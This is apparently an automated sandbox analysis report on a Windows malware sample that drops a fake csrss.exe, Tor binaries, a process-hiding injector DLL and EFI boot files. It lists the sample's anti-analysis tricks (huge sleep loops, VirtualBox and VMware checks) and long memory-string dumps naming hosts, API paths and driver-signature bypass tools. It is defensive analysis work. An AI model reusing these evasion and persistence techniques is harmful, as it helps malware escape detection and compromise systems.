WRONGLEVEL 2 HALTEDLEVEL 3 HALTEDMEMPROFILERATEMULTIPARTFILESNEED MORE DATANIL ELEM TYPE!NO MODULE DATANO SUCH DEVICEOPEN EVENT: %WPARSE CERT: %WPROTOCOL ERRORREAD CERTS: %WREAD_FRAME_EOFREFLECT.VALUE.REMOVE APP: %WRUNTIME: FULL=RUNTIME: WANT=S.ALLOCCOUNT= SEMAROOT QUEUESERVER.VERSIONSTACK OVERFLOWSTOPM SPINNINGSTORE64 FAILEDSYNC.COND.WAITTEXT FILE BUSYTIME.LOCATION(TIMEENDPERIODTOO MANY LINKSTOO MANY USERSTORRC FILENAMEUNEXPECTED EOFUNKNOWN CODE: UNKNOWN ERROR UNKNOWN METHODUNKNOWN MODE: UNREACHABLE: UNSAFE.POINTERUSERARENASTATEVIRTUALBOX: %WVMWARETRAY.EXEVMWAREUSER.EXEWII LIBNUP/1.0WINAPI ERROR #WINDOW CREATEDWORK.FULL != 0XENSERVICE.EXEZERO PARAMETER WITH GC PROG
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8520 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 9036 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7864 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6976 Thread sleep count: 8562 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5028 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 980 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3480 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8868 Thread sleep count: 8504 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2032 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 9076 Thread sleep count: 8214 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 9128 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8540 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2484 Thread sleep count: 8248 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6464 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6688 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8056 Thread sleep count: 8222 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2816 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6608 Thread sleep count: 7947 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5780 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe TID: 1488 Thread sleep time: -370000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Found dropped PE file which has not been started or loaded
Source: C:\Windows\rss\csrss.exe Dropped PE file which has not been started: B:\EFI\Boot\old.efi (copy) Jump to dropped file
Source: C:\Windows\rss\csrss.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\libevent_extra-2-1-7.dll Jump to dropped file
Source: C:\Windows\rss\csrss.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\libevent_core-2-1-7.dll Jump to dropped file
Source: C:\Windows\rss\csrss.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll Jump to dropped file
Source: C:\Windows\rss\csrss.exe Dropped PE file which has not been started: C:\EFI\Boot\EfiGuardDxe.efi Jump to dropped file
Source: C:\Windows\rss\csrss.exe Dropped PE file which has not been started: C:\EFI\Boot\bootx64.efi Jump to dropped file
Source: C:\Windows\rss\csrss.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\tor-gencert.exe Jump to dropped file
Source: C:\Windows\rss\csrss.exe Dropped PE file which has not been started: C:\EFI\Microsoft\Boot\bootmgfw.efi Jump to dropped file
Source: C:\Windows\rss\csrss.exe Dropped PE file which has not been started: B:\EFI\Microsoft\Boot\fw.efi (copy) Jump to dropped file
Contains long sleeps (>= 3 min)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8504 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8597
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8368
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8562
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8327
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8260
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8504
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8214
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8294
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8248
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8413
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8222
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7947
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Window / User API: threadDelayed 370
Contains capabilities to detect virtual machines
Source: C:\Users\user\Desktop\kdsyitkxmS.exe File opened / queried: VBoxGuest Jump to behavior
Source: C:\Users\user\Desktop\kdsyitkxmS.exe File opened / queried: vmci Jump to behavior
Source: C:\Users\user\Desktop\kdsyitkxmS.exe File opened / queried: HGFS Jump to behavior
Source: C:\Users\user\Desktop\kdsyitkxmS.exe File opened / queried: VBoxTrayIPC Jump to behavior
Source: C:\Users\user\Desktop\kdsyitkxmS.exe File opened / queried: \pipe\VBoxTrayIPC Jump to behavior
Source: C:\Users\user\Desktop\kdsyitkxmS.exe File opened / queried: VBoxMiniRdrDN Jump to behavior
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Users\user\Desktop\kdsyitkxmS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
Source: C:\Users\user\Desktop\kdsyitkxmS.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: ... omitting accept-charsetafter EfiGuardallocfreetracebad allocCountbad record MACbad restart PCbad span statebtc.usebsv.comcert installedchecksum errorcontent-lengthcouldn't patchdata truncateddistributor_iddriver removederror responsefile too largefinalizer waitgcstoptheworldget uptime: %wgetprotobynamegot system PIDinitial serverinternal errorinvalid syntaxis a directorykey size wronglevel 2 haltedlevel 3 haltedmemprofileratemultipartfilesneed more datanil elem type!no module datano such deviceopen event: %wparse cert: %wprotocol errorread certs: %wread_frame_eofreflect.Value.remove app: %wruntime: full=runtime: want=s.allocCount= semaRoot queueserver.versionstack overflowstopm spinningstore64 failedsync.Cond.Waittext file busytime.Location(timeEndPeriodtoo many linkstoo many userstorrc filenameunexpected EOFunknown code: unknown error unknown methodunknown mode: unreachable: unsafe.PointeruserArenaStatevirtualbox: %wvmwaretray.exevmwareuser.exewii libnup/1.0winapi error #window createdwork.full != 0xenservice.exezero parameter with GC prog
Source: csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: RTP.exeSYSTEMROOT=SetFileTimeSignWritingSoft_DottedSystemDriveTTL expiredUninstallerVBoxServiceVMUSrvc.exeVariantInitVirtualFreeVirtualLockWSARecvFromWarang_CitiWhite_SpaceWinDefender[:^xdigit:]\dsefix.exeadditionalsalarm clockapplicationassistQueueauthoritiesbad addressbad argSizebad m valuebad messagebad timedivbitcoins.skbroken pipecampaign_idcgocall nilclobberfreeclosesocketcombase.dllcreated by crypt32.dlle2.keff.orgembedded/%sexternal IPfile existsfinal tokenfloat32nan2float64nan1float64nan2float64nan3gccheckmarkgeneralizedget CDN: %wgetpeernamegetsocknameglobalAllochttp2clienthttp2serverhttps_proxyi/o timeoutlocal errormSpanManualmethodargs(minTrigger=move %s: %wmswsock.dllnetpollInitnext servernil contextopera-proxyorannis.comout of syncparse errorprocess: %sreflect.SetreflectOffsretry-afterruntime: P runtime: g runtime: p scheddetailsechost.dllsecur32.dllservice: %sshell32.dllshort writestack tracestart proxytaskmgr.exetls: alert(tracealloc(traffic updunreachableuserenv.dllversion.dllversion=195wininet.dllwup_process (sensitive) B (
Source: csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: entersyscallexit status failed to %wfound av: %sgcBitsArenasgcpacertracegetaddrinfowgot TI tokenguid_machineharddecommithost is downhttp2debug=1http2debug=2illegal seekinjector.exeinstall_dateinvalid baseinvalid pathinvalid portinvalid slotiphlpapi.dllkernel32.dllmachine_guidmadvdontneedmax-forwardsmheapSpecialmsftedit.dllmspanSpecialnetapi32.dllno such hostnon-existentnot pollableoleaut32.dllout of rangeparse PE: %wproxyconnectrandautoseedrecv_goaway_reflect.Copyreleasep: m=remote errorremoving appruntime: gp=runtime: sp=s ap traffics hs trafficself-preemptsetupapi.dllshort bufferspanSetSpinesweepWaiterstraceStringstraffic/readtransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=worker mode wtsapi32.dll != sweepgen (default %q) (default %v) MB globals, MB) workers= called from flushedWork idlethreads= in host name is nil, not nStackRoots= out of range pluginpath= s.spanclass= span.base()= syscalltick= work.nproc= work.nwait= %s/rawaddr/%s%s\%s\drivers, gp->status=, not pointer-bind-address-byte block (3814697265625: unknown pc Accept-RangesAuthorizationCLIENT_RANDOMCONNECTION-IDCONNECT_ERRORCache-ControlCertOpenStoreCoTaskMemFreeConnectServerContent-RangeDONT-FRAGMENTDeleteServiceDestroyWindowDistributorIDECDSAWithSHA1EnumProcessesExitWindowsExFQDN too longFindFirstFileFindNextFileWFindResourceWFreeAddrInfoWGC sweep waitGeoIPFile %s
Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: DnsRecordListFreeENHANCE_YOUR_CALMEnumThreadWindowsFLE Standard TimeFailed DependencyGC assist markingGMT Standard TimeGTB Standard TimeGetCurrentProcessGetShortPathNameWHEADER_TABLE_SIZEHKEY_CLASSES_ROOTHKEY_CURRENT_USERHTTP_1_1_REQUIREDIf-Modified-SinceIsTokenRestrictedLookupAccountSidWMESSAGE-INTEGRITYMoved PermanentlyOld_North_ArabianOld_South_ArabianOther_ID_ContinuePython-urllib/2.5QueryWorkingSetExRESERVATION-TOKENReadProcessMemoryRegLoadMUIStringWRtlGetCurrentPebSafeArrayCopyDataSafeArrayCreateExSentence_TerminalSysAllocStringLenSystemFunction036Too Many RequestsTransfer-EncodingUnexpected escapeUnified_IdeographUnknown AttributeVGAuthService.exeWSAEnumProtocolsWWTSQueryUserTokenWrite after CloseWrong CredentialsX-Idempotency-Key\System32\drivers\\.\VBoxMiniRdrDN
Source: csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: IP addressIsValidSidKeep-AliveKharoshthiLocalAllocLockFileExLogonUserWManichaeanMessage-IdNo ContentOld_ItalicOld_PermicOld_TurkicOpenEventWOpenMutexWOpenThreadOther_MathPOSTALCODEParseAddr(ParseFloatPhoenicianProcessingPulseEventRIPEMD-160RST_STREAMResetEventSHA256-RSASHA384-RSASHA512-RSASYSTEMROOTSaurashtraSecureBootSet-CookieShowWindowTor uptimeUser-AgentVMSrvc.exeWSACleanupWSASocketWWSAStartupWget/1.9.1Windows 10Windows 11[:^alnum:][:^alpha:][:^ascii:][:^blank:][:^cntrl:][:^digit:][:^graph:][:^lower:][:^print:][:^punct:][:^space:][:^upper:][:xdigit:]\\.\WinMon\patch.exe^{[\w-]+}$app_%d.txtatomicand8attr%d=%s cmd is nilcomplex128connectiondebug calldnsapi.dlldsefix.exedwmapi.dlle.keff.orgexecerrdotexitThreadexp masterfloat32nanfloat64nangetsockoptgoroutine http_proxyimage/avifimage/jpegimage/webpimpossibleindicationinvalid IPinvalidptrkeep-alivemSpanInUsemyhostnameno resultsnot a boolnot signednotifyListowner diedpowershellprl_cc.exeprofInsertres binderres masterresumptionrune <nil>runtime: gs.state = schedtracesemacquiresend stateset-cookiesetsockoptskipping: socks bindstackLarget.Kind == terminatedtext/plaintime.Date(time.Localtracefree(tracegc()
Source: csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: GetActiveObjectGetAdaptersInfoGetCommTimeoutsGetCommandLineWGetFirmwareTypeGetProcessTimesGetSecurityInfoGetStartupInfoWGlobal\qtxp9g8wHanifi_RohingyaICE-CONTROLLINGIdempotency-KeyImpersonateSelfInstall failureIsWindowUnicodeIsWindowVisibleIsWow64Process2Length RequiredLoadLibraryExALoadLibraryExWNot ImplementedNtSuspendThreadOpenThreadTokenOther_LowercaseOther_UppercasePKCS1WithSHA256PKCS1WithSHA384PKCS1WithSHA512Partial ContentPostQuitMessageProcess32FirstWPsalter_PahlaviQueryDosDeviceWRegCreateKeyExWRegDeleteValueWRequest TimeoutRtlDefaultNpAclSafeArrayCreateSafeArrayGetDimSafeArrayGetIIDSafeArrayUnlockScheduledUpdateSetCommTimeoutsSetSecurityInfoSetVolumeLabelWShellExecuteExWStringFromCLSIDStringFromGUID2TerminateThreadUnescaped quoteUninstallStringUnmapViewOfFileVBoxService.exeVPS.hsmiths.comWinsta0\DefaultX-Forwarded-For\\.\VBoxTrayIPC]
Source: csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: acceptactivechan<-closedcookiedirectdomainefenceempty exec: expectfamilygeoip6gopherhangupheaderinternip+netkilledlistenminutenetdnsnumberobjectoriginpopcntrdtscpreadatreasonremoverenamereturnrun-v3rune1 secondselectsendtoserversocketsocks socks5statusstringstructsweep sysmontelnettimersuint16uint32uint64unuseduptimevmhgfsvmxnetvpc-s3wup_hsxennetxensvcxenvdb %v=%v, (conn) (scan (scan) MB in Value> allocs dying= flags= len=%d locks= m->g0= nmsys= pad1= pad2= s=nil
Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SafeArrayCopyDataSafeArrayCreateExSentence_TerminalSysAllocStringLenSystemFunction036Too Many RequestsTransfer-EncodingUnexpected escapeUnified_IdeographUnknown AttributeVGAuthService.exeWSAEnumProtocolsWWTSQueryUserTokenWrite after CloseWrong CredentialsX-Idempotency-Key\System32\drivers\\.\VBoxMiniRdrDN
Source: csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: (MISSING)(unknown), newval=, oldval=, size = , tail = -07:00:00/api/cdn?/api/poll127.0.0.1244140625: status=AuthorityBassa_VahBhaiksukiClassINETCuneiformDiacriticEVEN-PORTExecQueryFindCloseForbiddenGetDIBitsHex_DigitInheritedInstMatchInstRune1InterfaceKhudawadiLocalFreeMalayalamMongolianMoveFileWNabataeanNot FoundOP_RETURNOSCaptionPalmyreneParseUintPatchTimePublisherReleaseDCRemoveAllSTUN addrSamaritanSee OtherSeptemberSundaneseSysnativeToo EarlyTrailer: TypeCNAMETypeHINFOTypeMINFOUse ProxyVBoxGuestVBoxMouseVBoxVideoWSASendToWednesdayWindows 7WriteFileZ07:00:00[%v = %d][:^word:][:alnum:][:alpha:][:ascii:][:blank:][:cntrl:][:digit:][:graph:][:lower:][:print:][:punct:][:space:][:upper:]_outboundatomicor8attributeb.ooze.ccbad indirbus errorchallengechan sendcomplex64connectexcopystackcsrss.exectxt != 0d.nx != 0dns,filesecdsa.netempty urlfiles,dnsfn.48.orgfodhelperfork/execfuncargs(gdi32.dllhchanLeafimage/gifimage/pnginittraceinterfaceinterruptinvalid nipv6-icmplocalhostmSpanDeadnew tokennil errorntdll.dllole32.dllomitemptyop_returnpanicwaitpatch.exepclmulqdqpreemptedprintableprofBlockprotocol proxy.exepsapi.dllquestionsreboot inrecover: reflect: rwxrwxrwxscavtracestackpoolsucceededtask %+v
Source: csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: tracebackunderflowunhandleduninstallunzip Torunzip: %wurn:uuid:w3m/0.5.1wbufSpanswebsocketxenevtchn} stack=[ netGo = MB goal, flushGen for type gfreecnt= heapGoal= pages at ptrSize= runqsize= runqueue= s.base()= spinning= stopwait= stream=%d sweepgen sweepgen= targetpc= throwing= until pc=%!(NOVERB)%!Weekday(%s.uuid.%s%s|%s%s|%s(BADINDEX), bound = , limit = -noprofile-uninstall.localhost/dev/stdin/etc/hosts/show-eula12207031256103515625: parsing :authorityAdditionalBad varintCampaignIDCancelIoExChorasmianClassCHAOSClassCSNETConnectionContent-IdCreateFileCreatePipeDSA-SHA256DeprecatedDevanagariDnsQuery_WECDSA-SHA1END_STREAMERROR-CODEException GC forced
Source: csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: Not ImplementedNtSuspendThreadOpenThreadTokenOther_LowercaseOther_UppercasePKCS1WithSHA256PKCS1WithSHA384PKCS1WithSHA512Partial ContentPostQuitMessageProcess32FirstWPsalter_PahlaviQueryDosDeviceWRegCreateKeyExWRegDeleteValueWRequest TimeoutRtlDefaultNpAclSafeArrayCreateSafeArrayGetDimSafeArrayGetIIDSafeArrayUnlockScheduledUpdateSetCommTimeoutsSetSecurityInfoSetVolumeLabelWShellExecuteExWStringFromCLSIDStringFromGUID2TerminateThreadUnescaped quoteUninstallStringUnmapViewOfFileVBoxService.exeVPS.hsmiths.comWinsta0\DefaultX-Forwarded-For\\.\VBoxTrayIPC]
Source: csrss.exe, 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: main.isRunningInsideVMWare
Source: csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: VirtualUnlockWINDOW_UPDATEWTSFreeMemoryWriteConsoleW[FrameHeader \\.\VBoxGuestaccept-rangesaccess deniedadvapi32.dll
Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: &gt;&lt;'\'') = ) m=+Inf-Inf.bat.cmd.com.css.exe.gif.htm.jpg.mjs.pdf.png.svg.sys.xml0x%x1.1110803125: p=ACDTACSTAEDTAESTAKDTAKSTAWSTAhomAtoiCDN=CESTChamDATADashDataDateEESTEULAEtagFromGOGCGoneHostJulyJuneLEAFLisuMiaoModiNZDTNZSTNameNewaPINGPOSTPathQEMUROOTSASTSTARSendStatTempThaiTypeUUID"%s"\rss\smb\u00
Source: csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: VirtualUnlockWINDOW_UPDATEWTSFreeMemoryWriteConsoleW[FrameHeader \\.\VBoxGuestaccept-rangesaccess deniedadvapi32.dllauthorizationbad flushGen bad map statebtc.cihar.combtc.xskyx.netcache-controlcontent-rangecouldn't polldalTLDpSugct?data is emptydouble unlockemail addressempty integerexchange fullfatal error: gethostbynamegetservbynamegzip, deflateif-none-matchignoring fileimage/svg+xmlinvalid ASN.1invalid UTF-8invalid base kernel32.dllkey expansionlame referrallast-modifiedlevel 3 resetload64 failedmaster secretmin too largename is emptynil stackbasenot a Float32open file: %wout of memoryparallels: %wparsing time powrprof.dllprl_tools.exeprofMemActiveprofMemFutureread EULA: %wrebooting nowruntime: seq=runtime: val=service stateset event: %wsigner is nilsocks connectsrmount errortimer expiredtraceStackTabtrailing dataunimplementedunsupported: user canceledvalue method virtualpc: %wxadd64 failedxchg64 failed}
Source: csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: unixpacketunknown pcuser-agentuser32.dllvmusbmousevmware: %wws2_32.dll of size (targetpc= , plugin: ErrCode=%v KiB work, bytes ...
Source: csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: VersionVirtualWSARecvWSASend"%s" %stypes value=abortedalt -> answersany -> booleancharsetchunkedcmd.execonnectconsolecpu: %scpuprofderiveddriversexpiresfloat32float64forcegcgctracehead = http://invalidlog.txtlookup messageminpc= nil keynop -> number pacer: panic: readdirrefererrefreshrequestrunningserial:server=signal svc_versyscalltor.exetraileruintptrunknownupgradeversionvmmousevpcuhubwaitingwindowswsarecvwsasendwup_verxen: %wxennet6 bytes, data=%q etypes incr=%v is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= ping=%q pointer stack=[ status %!Month(%02d%02d%s %s:%d%s: 0x%x-cleanup2.5.4.102.5.4.112.5.4.1748828125?4#?'1#0AcceptExAcceptedAllocateAltitudeArmenianBAD RANKBalineseBopomofoBugineseCancelIoCherokeeClassANYConflictContinueCurveID(CyrillicDNS nameDSA-SHA1DecemberDefenderDeleteDCDuployanEULA.txtEqualSidEthiopicExtenderFebruaryFirewallFullPathGeorgianGetOEMCPGoStringGujaratiGurmukhiHTTP/1.1HTTP/2.0HiraganaInstFailInstRuneIsWindowJavaneseKatakanaKayah_LiLIFETIMELinear_ALinear_BLocationLsaCloseMD5+SHA1MahajaniNO_ERRORNO_PROXYNovemberOl_ChikiPRIORITYPROGRESSParseIntPersoconPhags_PaQuestionReadFileReceivedSETTINGSSHA1-RSASHA3-224SHA3-256SHA3-384SHA3-512SOFTWARESaturdaySetEventSystem32TagbanwaTai_ThamTai_VietThursdayTifinaghTypeAAAATypeAXFRUSERHASHUSERNAMEUgariticVBoxWddmWSAIoctlWinmonFSWmiPrvSE[::1]:53[:word:][signal \\.\HGFS\\.\vmcistack=[_NewEnum_gatewayacceptexaddress bad instcgocheckcontinuecs deadlockdefault:dial: %wdnsquerydurationeax ebp ebx ecx edi edx eflags eip embeddedesi esp execwaitexporterf is nilfinishedfs gs hijackedhttp/1.1https://if-matchif-rangeinfinityinjectorinvalid 